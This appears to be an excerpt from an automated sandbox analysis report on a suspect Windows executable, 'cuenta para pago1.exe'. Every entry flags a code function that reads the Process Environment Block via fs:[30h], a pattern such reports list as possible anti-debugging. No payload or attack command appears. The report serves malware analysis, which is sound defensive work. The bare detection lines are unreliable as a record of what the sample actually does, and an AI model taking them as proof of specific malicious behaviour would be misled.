        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DE547 mov eax, dword ptr fs:[00000030h]2_2_348DE547
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498A553 mov eax, dword ptr fs:[00000030h]2_2_3498A553
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F6540 mov eax, dword ptr fs:[00000030h]2_2_348F6540
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DC560 mov eax, dword ptr fs:[00000030h]2_2_348DC560
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494C691 mov eax, dword ptr fs:[00000030h]2_2_3494C691
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0680 mov eax, dword ptr fs:[00000030h]2_2_348D0680
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F68C mov eax, dword ptr fs:[00000030h]2_2_3497F68C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C8690 mov eax, dword ptr fs:[00000030h]2_2_348C8690
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349886A8 mov eax, dword ptr fs:[00000030h]2_2_349886A8
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349886A8 mov eax, dword ptr fs:[00000030h]2_2_349886A8
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C06CF mov eax, dword ptr fs:[00000030h]2_2_348C06CF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498A6C0 mov eax, dword ptr fs:[00000030h]2_2_3498A6C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348ED6D0 mov eax, dword ptr fs:[00000030h]2_2_348ED6D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493C6F2 mov eax, dword ptr fs:[00000030h]2_2_3493C6F2
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493C6F2 mov eax, dword ptr fs:[00000030h]2_2_3493C6F2
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B96E0 mov eax, dword ptr fs:[00000030h]2_2_348B96E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B96E0 mov eax, dword ptr fs:[00000030h]2_2_348B96E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CC6E0 mov eax, dword ptr fs:[00000030h]2_2_348CC6E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C56E0 mov eax, dword ptr fs:[00000030h]2_2_348C56E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C56E0 mov eax, dword ptr fs:[00000030h]2_2_348C56E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C56E0 mov eax, dword ptr fs:[00000030h]2_2_348C56E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E66E0 mov eax, dword ptr fs:[00000030h]2_2_348E66E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E66E0 mov eax, dword ptr fs:[00000030h]2_2_348E66E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348ED600 mov eax, dword ptr fs:[00000030h]2_2_348ED600
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348ED600 mov eax, dword ptr fs:[00000030h]2_2_348ED600
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F607 mov eax, dword ptr fs:[00000030h]2_2_3497F607
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994600 mov eax, dword ptr fs:[00000030h]2_2_34994600
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34953608 mov eax, dword ptr fs:[00000030h]2_2_34953608
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C5622 mov eax, dword ptr fs:[00000030h]2_2_348C5622
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C5622 mov eax, dword ptr fs:[00000030h]2_2_348C5622
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C7623 mov eax, dword ptr fs:[00000030h]2_2_348C7623
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496D62C mov ecx, dword ptr fs:[00000030h]2_2_3496D62C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496D62C mov ecx, dword ptr fs:[00000030h]2_2_3496D62C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496D62C mov eax, dword ptr fs:[00000030h]2_2_3496D62C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C0630 mov eax, dword ptr fs:[00000030h]2_2_348C0630
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F0630 mov eax, dword ptr fs:[00000030h]2_2_348F0630
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BD64A mov eax, dword ptr fs:[00000030h]2_2_348BD64A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BD64A mov eax, dword ptr fs:[00000030h]2_2_348BD64A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C3640 mov eax, dword ptr fs:[00000030h]2_2_348C3640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF640 mov eax, dword ptr fs:[00000030h]2_2_348DF640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF640 mov eax, dword ptr fs:[00000030h]2_2_348DF640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DF640 mov eax, dword ptr fs:[00000030h]2_2_348DF640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FC640 mov eax, dword ptr fs:[00000030h]2_2_348FC640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FC640 mov eax, dword ptr fs:[00000030h]2_2_348FC640
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F265C mov eax, dword ptr fs:[00000030h]2_2_348F265C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F265C mov ecx, dword ptr fs:[00000030h]2_2_348F265C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F265C mov eax, dword ptr fs:[00000030h]2_2_348F265C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C965A mov eax, dword ptr fs:[00000030h]2_2_348C965A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C965A mov eax, dword ptr fs:[00000030h]2_2_348C965A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902670 mov eax, dword ptr fs:[00000030h]2_2_34902670
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902670 mov eax, dword ptr fs:[00000030h]2_2_34902670
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F666D mov esi, dword ptr fs:[00000030h]2_2_348F666D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F666D mov eax, dword ptr fs:[00000030h]2_2_348F666D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F666D mov eax, dword ptr fs:[00000030h]2_2_348F666D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B7662 mov eax, dword ptr fs:[00000030h]2_2_348B7662
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B7662 mov eax, dword ptr fs:[00000030h]2_2_348B7662
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B7662 mov eax, dword ptr fs:[00000030h]2_2_348B7662
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D3660 mov eax, dword ptr fs:[00000030h]2_2_348D3660
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D3660 mov eax, dword ptr fs:[00000030h]2_2_348D3660
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D3660 mov eax, dword ptr fs:[00000030h]2_2_348D3660
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C0670 mov eax, dword ptr fs:[00000030h]2_2_348C0670
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E79D mov eax, dword ptr fs:[00000030h]2_2_3493E79D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499B781 mov eax, dword ptr fs:[00000030h]2_2_3499B781
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499B781 mov eax, dword ptr fs:[00000030h]2_2_3499B781
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F1796 mov eax, dword ptr fs:[00000030h]2_2_348F1796
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F1796 mov eax, dword ptr fs:[00000030h]2_2_348F1796
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349917BC mov eax, dword ptr fs:[00000030h]2_2_349917BC
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C07A7 mov eax, dword ptr fs:[00000030h]2_2_348C07A7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498D7A7 mov eax, dword ptr fs:[00000030h]2_2_3498D7A7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498D7A7 mov eax, dword ptr fs:[00000030h]2_2_3498D7A7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498D7A7 mov eax, dword ptr fs:[00000030h]2_2_3498D7A7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F7CF mov eax, dword ptr fs:[00000030h]2_2_3497F7CF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C37E4 mov eax, dword ptr fs:[00000030h]2_2_348C37E4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE7E0 mov eax, dword ptr fs:[00000030h]2_2_348EE7E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C77F9 mov eax, dword ptr fs:[00000030h]2_2_348C77F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C77F9 mov eax, dword ptr fs:[00000030h]2_2_348C77F9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F717 mov eax, dword ptr fs:[00000030h]2_2_3497F717
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E270D mov eax, dword ptr fs:[00000030h]2_2_348E270D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E270D mov eax, dword ptr fs:[00000030h]2_2_348E270D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E270D mov eax, dword ptr fs:[00000030h]2_2_348E270D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CD700 mov ecx, dword ptr fs:[00000030h]2_2_348CD700
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB705 mov eax, dword ptr fs:[00000030h]2_2_348BB705
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB705 mov eax, dword ptr fs:[00000030h]2_2_348BB705
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB705 mov eax, dword ptr fs:[00000030h]2_2_348BB705
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB705 mov eax, dword ptr fs:[00000030h]2_2_348BB705
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498970B mov eax, dword ptr fs:[00000030h]2_2_3498970B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498970B mov eax, dword ptr fs:[00000030h]2_2_3498970B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C471B mov eax, dword ptr fs:[00000030h]2_2_348C471B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C471B mov eax, dword ptr fs:[00000030h]2_2_348C471B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E9723 mov eax, dword ptr fs:[00000030h]2_2_348E9723
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F174A mov eax, dword ptr fs:[00000030h]2_2_348F174A
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496E750 mov eax, dword ptr fs:[00000030h]2_2_3496E750
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF75B mov eax, dword ptr fs:[00000030h]2_2_348BF75B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov eax, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov eax, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov eax, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov ecx, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov eax, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E2755 mov eax, dword ptr fs:[00000030h]2_2_348E2755
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D2760 mov ecx, dword ptr fs:[00000030h]2_2_348D2760
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 mov eax, dword ptr fs:[00000030h]2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C4779 mov eax, dword ptr fs:[00000030h]2_2_348C4779
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C4779 mov eax, dword ptr fs:[00000030h]2_2_348C4779
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F0774 mov eax, dword ptr fs:[00000030h]2_2_348F0774
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BA093 mov ecx, dword ptr fs:[00000030h]2_2_348BA093
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34994080 mov eax, dword ptr fs:[00000030h]2_2_34994080
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BC090 mov eax, dword ptr fs:[00000030h]2_2_348BC090
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349950B7 mov eax, dword ptr fs:[00000030h]2_2_349950B7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F0A5 mov eax, dword ptr fs:[00000030h]2_2_3496F0A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349000A5 mov eax, dword ptr fs:[00000030h]2_2_349000A5
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497B0AF mov eax, dword ptr fs:[00000030h]2_2_3497B0AF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348DB0D0 mov eax, dword ptr fs:[00000030h]2_2_348DB0D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB0D6 mov eax, dword ptr fs:[00000030h]2_2_348BB0D6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB0D6 mov eax, dword ptr fs:[00000030h]2_2_348BB0D6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB0D6 mov eax, dword ptr fs:[00000030h]2_2_348BB0D6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB0D6 mov eax, dword ptr fs:[00000030h]2_2_348BB0D6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B90F8 mov eax, dword ptr fs:[00000030h]2_2_348B90F8
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B90F8 mov eax, dword ptr fs:[00000030h]2_2_348B90F8
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B90F8 mov eax, dword ptr fs:[00000030h]2_2_348B90F8
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B90F8 mov eax, dword ptr fs:[00000030h]2_2_348B90F8
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BC0F6 mov eax, dword ptr fs:[00000030h]2_2_348BC0F6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FD0F0 mov eax, dword ptr fs:[00000030h]2_2_348FD0F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FD0F0 mov ecx, dword ptr fs:[00000030h]2_2_348FD0F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C8009 mov eax, dword ptr fs:[00000030h]2_2_348C8009
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E5004 mov eax, dword ptr fs:[00000030h]2_2_348E5004
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E5004 mov ecx, dword ptr fs:[00000030h]2_2_348E5004
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BD02D mov eax, dword ptr fs:[00000030h]2_2_348BD02D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499505B mov eax, dword ptr fs:[00000030h]2_2_3499505B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F0044 mov eax, dword ptr fs:[00000030h]2_2_348F0044
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C1051 mov eax, dword ptr fs:[00000030h]2_2_348C1051
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C1051 mov eax, dword ptr fs:[00000030h]2_2_348C1051
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34969060 mov eax, dword ptr fs:[00000030h]2_2_34969060
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C6074 mov eax, dword ptr fs:[00000030h]2_2_348C6074
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C6074 mov eax, dword ptr fs:[00000030h]2_2_348C6074
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C7072 mov eax, dword ptr fs:[00000030h]2_2_348C7072
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901190 mov eax, dword ptr fs:[00000030h]2_2_34901190
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901190 mov eax, dword ptr fs:[00000030h]2_2_34901190
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C4180 mov eax, dword ptr fs:[00000030h]2_2_348C4180
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C4180 mov eax, dword ptr fs:[00000030h]2_2_348C4180
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C4180 mov eax, dword ptr fs:[00000030h]2_2_348C4180
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E9194 mov eax, dword ptr fs:[00000030h]2_2_348E9194
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FE1A4 mov eax, dword ptr fs:[00000030h]2_2_348FE1A4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FE1A4 mov eax, dword ptr fs:[00000030h]2_2_348FE1A4
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349951B6 mov eax, dword ptr fs:[00000030h]2_2_349951B6
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F31BE mov eax, dword ptr fs:[00000030h]2_2_348F31BE
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F31BE mov eax, dword ptr fs:[00000030h]2_2_348F31BE
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F41BB mov ecx, dword ptr fs:[00000030h]2_2_348F41BB
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F41BB mov eax, dword ptr fs:[00000030h]2_2_348F41BB
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F41BB mov eax, dword ptr fs:[00000030h]2_2_348F41BB
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D01C0 mov eax, dword ptr fs:[00000030h]2_2_348D01C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D01C0 mov eax, dword ptr fs:[00000030h]2_2_348D01C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D51C0 mov eax, dword ptr fs:[00000030h]2_2_348D51C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D51C0 mov eax, dword ptr fs:[00000030h]2_2_348D51C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D51C0 mov eax, dword ptr fs:[00000030h]2_2_348D51C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D51C0 mov eax, dword ptr fs:[00000030h]2_2_348D51C0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B81EB mov eax, dword ptr fs:[00000030h]2_2_348B81EB
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C91E5 mov eax, dword ptr fs:[00000030h]2_2_348C91E5
